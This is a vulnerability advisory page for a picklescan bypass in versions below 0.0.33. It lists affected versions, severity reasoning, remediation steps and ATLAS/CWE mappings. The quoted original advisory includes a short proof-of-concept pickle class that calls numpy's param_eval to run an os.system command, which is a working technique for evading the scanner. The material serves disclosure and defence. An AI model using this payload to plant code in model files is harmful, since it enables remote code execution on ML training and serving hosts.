AI Threat Alert
picklescan — the de-facto ML model safety scanner — has a scanner bypass that allows malicious pickle files to pass as clean while executing arbitrary code on load. Any pipeline using picklescan < 0.0.33 as a security gate is providing a false sense of security, which is worse than no gate at all. Patch to v0.0.33 immediately and re-scan every model file previously cleared by older versions.
What is the risk?
HIGH effective severity despite unassigned CVSS. The vulnerability does not just introduce a new attack path — it nullifies an existing compensating control that ML teams explicitly trust for model safety validation. Exploitability is moderate: requires numpy in the target environment (near-universal in ML stacks) and the ability to deliver a malicious file into the scan queue. Blast radius is significant: RCE on model serving or training infrastructure, not a sandbox escape — full host-level impact wherever pickle.load() executes.
What systems are affected?
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| picklescan | pip | < 0.0.33 | 0.0.33 |
Do you use picklescan? You're affected.
How severe is it?
What should I do?
5 steps-
Patch: Update picklescan to >= 0.0.33 immediately across all environments.
-
Re-scan: Retroactively re-validate all model files previously cleared by older picklescan versions — treat prior results as untrusted.
-
Migrate format: Where possible, switch PyTorch model storage to safetensors — eliminates the pickle deserialization attack surface entirely.
-
Defense-in-depth: Never rely on a single scanner as the sole control; add sandboxed model loading (isolated containers with no network access and restricted syscalls).
-
Detection: Alert on anomalous child process spawning from ML worker processes and unusual network connections originating from model loading jobs.
How is it classified?
Which compliance frameworks are affected?
This CVE is relevant to:
Frequently Asked Questions
What is GHSA-cffc-mxrf-mhh4?
picklescan — the de-facto ML model safety scanner — has a scanner bypass that allows malicious pickle files to pass as clean while executing arbitrary code on load. Any pipeline using picklescan < 0.0.33 as a security gate is providing a false sense of security, which is worse than no gate at all. Patch to v0.0.33 immediately and re-scan every model file previously cleared by older versions.
Is GHSA-cffc-mxrf-mhh4 actively exploited?
No confirmed active exploitation of GHSA-cffc-mxrf-mhh4 has been reported, but organizations should still patch proactively.
How to fix GHSA-cffc-mxrf-mhh4?
1. Patch: Update picklescan to >= 0.0.33 immediately across all environments. 2. Re-scan: Retroactively re-validate all model files previously cleared by older picklescan versions — treat prior results as untrusted. 3. Migrate format: Where possible, switch PyTorch model storage to safetensors — eliminates the pickle deserialization attack surface entirely. 4. Defense-in-depth: Never rely on a single scanner as the sole control; add sandboxed model loading (isolated containers with no network access and restricted syscalls). 5. Detection: Alert on anomalous child process spawning from ML worker processes and unusual network connections originating from model loading jobs.
What systems are affected by GHSA-cffc-mxrf-mhh4?
This vulnerability affects the following AI/ML architecture patterns: training pipelines, model serving, MLOps CI/CD pipelines, model registries, PyTorch model loading workflows.
What is the CVSS score for GHSA-cffc-mxrf-mhh4?
No CVSS score has been assigned yet.
What is the AI security impact?
Affected AI Architectures
MITRE ATLAS Techniques
AML.T0010.001 AI Software AML.T0011.000 Unsafe AI Artifacts AML.T0018.002 Embed Malware AML.T0058 Publish Poisoned Models AML.T0107 Exploitation for Defense Evasion Compliance Controls Affected
What are the technical details?
Original Advisory
### Summary Picklescan uses numpy.f2py.crackfortran.param_eval, which is a function in numpy to execute remote pickle files. ### Details The attack payload executes in the following steps: - First, the attacker crafts the payload by calling the numpy.f2py.crackfortran.param_eval function via reduce method. - Then, when the victim checks whether the pickle file is safe by using the Picklescan library and this library doesn't detect any dangerous functions, they decide to use pickle.load() on this malicious pickle file, thus leading to remote code execution. ### PoC ``` class RCE: def __reduce__(self): from numpy.f2py.crackfortran import param_eval return (param_eval,("os.system('ls')",None,None,None)) ``` ### Impact Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models. Attackers can embed malicious code in pickle file that remains undetected but executes when the pickle file is loaded. Attackers can distribute infected pickle files across ML models, APIs, or saved Python objects. ### Report by Pinji Chen (cpj24@mails.tsinghua.edu.cn) from the NISL lab (https://netsec.ccert.edu.cn/about) at Tsinghua University, Guanheng Liu (coolwind326@gmail.com).
Exploitation Scenario
An adversary targets an organization's ML model supply chain. They craft a malicious PyTorch .pkl file using numpy.f2py.crackfortran.param_eval as the __reduce__ callable — a function not on picklescan's blocklist. The file is uploaded to a public model registry (e.g., HuggingFace Hub) as a legitimate-looking fine-tuned model. The victim organization's automated pipeline downloads and scans it with picklescan — scan returns clean. Trusting the result, the pipeline calls pickle.load() and the payload executes: a reverse shell, credential harvester, or persistent backdoor planted in the training environment. From there, the adversary pivots to exfiltrate proprietary training data or poison downstream model artifacts.
Weaknesses (CWE)
CWE-502 Deserialization of Untrusted Data
Primary
CWE-94 Improper Control of Generation of Code ('Code Injection')
Primary
CWE-502 — Deserialization of Untrusted Data: The product deserializes untrusted data without sufficiently ensuring that the resulting data will be valid.
- [Architecture and Design, Implementation] If available, use the signing/sealing features of the programming language to assure that deserialized data has not been tainted. For example, a hash-based message authentication code (HMAC) could be used to ensure that data has not been modified.
- [Implementation] When deserializing data, populate a new object rather than just deserializing. The result is that the data flows through safe input validation and that the functions are safe.
Source: MITRE CWE corpus.
References
Timeline
Related Vulnerabilities
CVE-2026-3490 10.0 picklescan: blocklist bypass enables full RCE
Same package: picklescan GHSA-vvpj-8cmc-gx39 10.0 picklescan: security flaw enables exploitation
Same package: picklescan GHSA-g38g-8gr9-h9xp 9.8 picklescan: Allowlist Bypass evades input filtering
Same package: picklescan CVE-2025-1945 9.8 picklescan: ZIP flag bypass enables RCE in PyTorch models
Same package: picklescan GHSA-7wx9-6375-f5wh 9.8 picklescan: Allowlist Bypass evades input filtering
Same package: picklescan